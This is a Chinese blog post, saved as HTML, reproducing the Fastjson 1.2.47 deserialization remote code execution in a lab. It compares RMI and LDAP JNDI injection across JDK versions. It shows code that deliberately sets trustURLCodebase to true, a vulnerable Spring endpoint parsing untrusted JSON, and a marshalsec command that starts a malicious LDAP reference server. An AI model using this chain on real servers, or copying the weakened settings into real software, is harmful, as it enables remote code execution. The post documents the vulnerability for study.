<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta property="og:type" content="article">
<meta property="og:title" content="Fastjson-1-2-47-远程命令执行漏洞-2">
<meta property="og:url" content="https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/">
<meta property="og:site_name" content="Sampson&#39;s blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png">
<meta property="og:image" content="https://www.buhuixiu.com/images/jdk-8u-102.png">
<meta property="og:image" content="https://www.buhuixiu.com/images/jdk181.png">
<meta property="og:image" content="https://www.buhuixiu.com/images/fastjson-2-2.png">
<meta property="og:image" content="https://www.buhuixiu.com/images/jdk-by-ldap.png">
<meta property="og:image" content="https://www.buhuixiu.com/images/fastjson-2-3.png">
<meta property="article:published_time" content="2020-07-07T06:16:42.000Z">
<meta property="article:modified_time" content="2020-07-07T06:16:42.000Z">
<meta property="article:author" content="Sampson.Z">
<meta property="article:tag" content="Fastjson vulnerable poc">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Fastjson-1-2-47-远程命令执行漏洞-2</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2020/07/07/Java-JNDI%E6%B3%A8%E5%85%A5%E5%A6%82%E4%BD%95%E7%BB%95%E8%BF%87%E9%AB%98%E7%89%88%E6%9C%ACjdk-8u-191%E4%BB%A5%E4%B8%8A%E7%89%88%E6%9C%AC/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2020/07/06/%E7%A7%91%E5%AD%A6%E4%B8%8A%E7%BD%91/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&text=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&is_video=false&description=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Fastjson-1-2-47-远程命令执行漏洞-2&body=Check out this article: https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" href="http://www.tumblr.com/share/link?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&name=Fastjson-1-2-47-远程命令执行漏洞-2&description=&lt;link rel=&#34;stylesheet&#34; type=&#34;text/css&#34; href=&#34;https://cdn.jsdelivr.net/lightgallery.js/1.0.1/css/lightgallery.min.css&#34; /&gt;&lt;div class=&#34;.article-gallery&#34;&lt;h2 id=&#34;可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34;&gt;&lt;a href=&#34;#可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34; class=&#34;headerlink&#34; title=&#34;可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34;&gt;&lt;/a&gt;可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&lt;/h2&gt;&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png&#34;&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;div&gt;


&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk-8u-102.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk-8u-102.png&#34; width=70% height=70%&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.buhuixiu.com/images/jdk181.png&#34; class=&#34;gallery-item&#34;&gt;&lt;img src=&#34;https://www.buhuixiu.com/images/jdk181.png&#34; width=70% height=70%&gt;&lt;/a&gt;&lt;/img&gt;&lt;/p&gt;
&lt;/div&gt;
通过参考一些帖子，相应的较新版本的jdk都有了针对RMI方式的防御，
系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false，即默认不允许从远程的Codebase加载Reference工厂类。如果需要开启 RMI Registry 或者 COS Naming Service Provider的远程类加载功能，需要将前面说的两个属性值设置为true。"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&t=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AF%B9%E6%8E%A5LDAP%E6%9C%8D%E5%8A%A1-JNDI-Reference-Payload"><span class="toc-number">1.</span> <span class="toc-text">对接LDAP服务 + JNDI Reference Payload</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Fastjson-1-2-47-远程命令执行漏洞-2
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Sampson.Z</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-07-07T06:16:42.000Z" itemprop="datePublished">2020-07-07</time>
        
        (Updated: <time datetime="2020-07-07T06:16:42.000Z" itemprop="dateModified">2020-07-07</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Fastjson-%E7%9B%B8%E5%85%B3%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/">Fastjson 相关安全漏洞</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Fastjson-vulnerable-poc/" rel="tag">Fastjson vulnerable poc</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/css/lightgallery.min.css" /><div class=".article-gallery"<h2 id="可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。"><a href="#可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。" class="headerlink" title="可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。"></a>可以看到我们前面用的payload 发送方式，是RMI （Remote Method Invocation) 方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk:8u102 版本可以顺利的跑起来计算器，而 jdk:8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。</h2><p><a href="https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/jdk102-%E5%85%A8%E5%9B%BE%E8%BF%90%E8%A1%8C.png"></a></img></p>
<div>


<p><a href="https://www.buhuixiu.com/images/jdk-8u-102.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/jdk-8u-102.png" width=70% height=70%></a></img></p>
<p><a href="https://www.buhuixiu.com/images/jdk181.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/jdk181.png" width=70% height=70%></a></img></p>
</div>
通过参考一些帖子，相应的较新版本的jdk都有了针对RMI方式的防御，
系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false，即默认不允许从远程的Codebase加载Reference工厂类。如果需要开启 RMI Registry 或者 COS Naming Service Provider的远程类加载功能，需要将前面说的两个属性值设置为true。
<span id="more"></span>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.mybatis.controller;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * &lt;h3&gt;mybatis2&lt;/h3&gt;</span></span><br><span class="line"><span class="comment"> * &lt;p&gt;&lt;/p&gt;</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> : zhuxinkai</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> : 2020-07-07 15:32</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">SystemTest</span> </span>&#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line"></span><br><span class="line">        setValue();</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">setValue</span><span class="params">()</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">        System.setProperty(<span class="string">&quot;com.sun.jndi.rmi.object.trustURLCodebase&quot;</span>, <span class="string">&quot;true&quot;</span>);</span><br><span class="line">       </span><br><span class="line">        System.setProperty(<span class="string">&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;</span>, <span class="string">&quot;true&quot;</span>);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
然后在spring boot 实现的REST API中执行下这个设置方法。
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">@PostMapping(value = &quot;/rest&quot;,</span></span><br><span class="line"><span class="meta">        consumes = &quot;application/json;charset=UTF-8&quot;,</span></span><br><span class="line"><span class="meta">        produces = &quot;application/json;charset=UTF-8&quot;)</span></span><br><span class="line"><span class="meta">@ResponseBody</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">rest</span><span class="params">(<span class="meta">@RequestBody</span> String person)</span> </span>&#123;</span><br><span class="line"><span class="comment">//利用  System.setProperty(&quot;com.sun.jndi.rmi.object.trustURLCodebase&quot;, &quot;true&quot;) 改变两个默认值，进行测试。</span></span><br><span class="line"><span class="comment">//  System.setProperty(&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;, &quot;true&quot;);</span></span><br><span class="line">SystemTest.setValue();</span><br><span class="line"></span><br><span class="line">String data = person;</span><br><span class="line"><span class="comment">//System.out.println(person);</span></span><br><span class="line">    JSONObject obj = JSON.parseObject(person);</span><br><span class="line">    System.out.println(obj);</span><br><span class="line">    <span class="keyword">return</span> obj;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
通过相关的设置，发现8u181版本的jdk也可以正常执行rmi远程程序。所以可以证明，确实是这两个值增强了相应的安全设置。然而，这两个值是默认为false的，所以，相应的利用方式需要换一个姿势。



<h1 id="对接LDAP服务-JNDI-Reference-Payload"><a href="#对接LDAP服务-JNDI-Reference-Payload" class="headerlink" title="对接LDAP服务 + JNDI Reference Payload"></a>对接LDAP服务 + JNDI Reference Payload</h1><p>这个利用方式受限于  com.sun.jndi.ldap.object.trustURLCodebase，相应的利用方式直到2018年10月才修复。<br>在Oracle JDK 11.0.1、8u191、7u201、6u211之前，都可以使用这种方式进行执行。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">java -cp marshalsec-<span class="number">0.0</span><span class="number">.3</span>-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer <span class="string">&quot;http://192.168.0.119:8888/Exploit/#TouchFile&quot;</span> <span class="number">9999</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>利用marshalsec ,建立LDAP服务器监听端。这次我本地的jdk版本是8u181 版本的直接可以利用成功。<br><a href="https://www.buhuixiu.com/images/fastjson-2-2.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/fastjson-2-2.png"></a></img><br><a href="https://www.buhuixiu.com/images/jdk-by-ldap.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/jdk-by-ldap.png"></a></img></p>
<p><a href="https://www.buhuixiu.com/images/fastjson-2-3.png" class="gallery-item"><img src="https://www.buhuixiu.com/images/fastjson-2-3.png"></a></img></p>
</div><script src="https://cdn.jsdelivr.net/lightgallery.js/1.0.1/js/lightgallery.min.js"></script><script>if (typeof lightGallery !== 'undefined') {
        var options = {
            selector: '.gallery-item'
        };
        lightGallery(document.getElementsByClassName('.article-gallery')[0], options);
        }</script>
  </div>
</article>












		<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
		<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
		<!--<script src="//cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script>
    <script src='//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js'></script>-->
	<div id="vcomments"></div>
	<script>
		var notify = false == true ? true : false;
		var verify = false == true ? true : false;
		var visitor = true == true ? true : false;
  new Valine({
      el: '#vcomments',
				notify: notify,
				verify: verify,
    	app_id: 'blb6PJsThCi2aLC84uljjQzT-gzGzoHsz',
      app_key: '1PBJebm7VF0AiFpsf6Hhapdv',
			lang: 'en',
			placeholder: 'ヾﾉ≧∀≦)o快来评论一下吧!',
			avatar: 'monsterid',
			pageSize: 10,
			visitor: visitor
        });
    </script>






        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/tags/">标签</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AF%B9%E6%8E%A5LDAP%E6%9C%8D%E5%8A%A1-JNDI-Reference-Payload"><span class="toc-number">1.</span> <span class="toc-text">对接LDAP服务 + JNDI Reference Payload</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&text=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&is_video=false&description=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Fastjson-1-2-47-远程命令执行漏洞-2&body=Check out this article: https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&title=Fastjson-1-2-47-远程命令执行漏洞-2"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" href="http://www.tumblr.com/share/link?url=https://www.buhuixiu.com/2020/07/07/Fastjson-1-2-47-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-2-RMI%E5%92%8CLDAP%E4%B8%A4%E7%A7%8D%E5%A7%BF%E5%8A%BF/&name=Fastjson-1-2-47-远程命令执行漏洞-2&description=&lt;link rel=&#34;stylesheet&#34; type=&#34;text/css&#34; href=&#34;https://cdn.jsdelivr.net/lightgallery.js/1.0.1/css/lightgallery.min.css&#34; /&gt;&lt;div class=&#34;.article-gallery&#34;&lt;h2 id=&#34;可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34;&gt;&lt;a href=&#34;#可以看到我们前面用的payload-发送方式，是RMI-（Remote-Method-Invocation-方式。看到别人说这种方式的限制比较多，反正，我这边受到了jdk版本的限制。。jdk-8u102-版本可以顺利的跑起来计算器，而-jdk-8u181版本，却只是应用崩溃了，RMI远程代码没有执行效果。&#34; 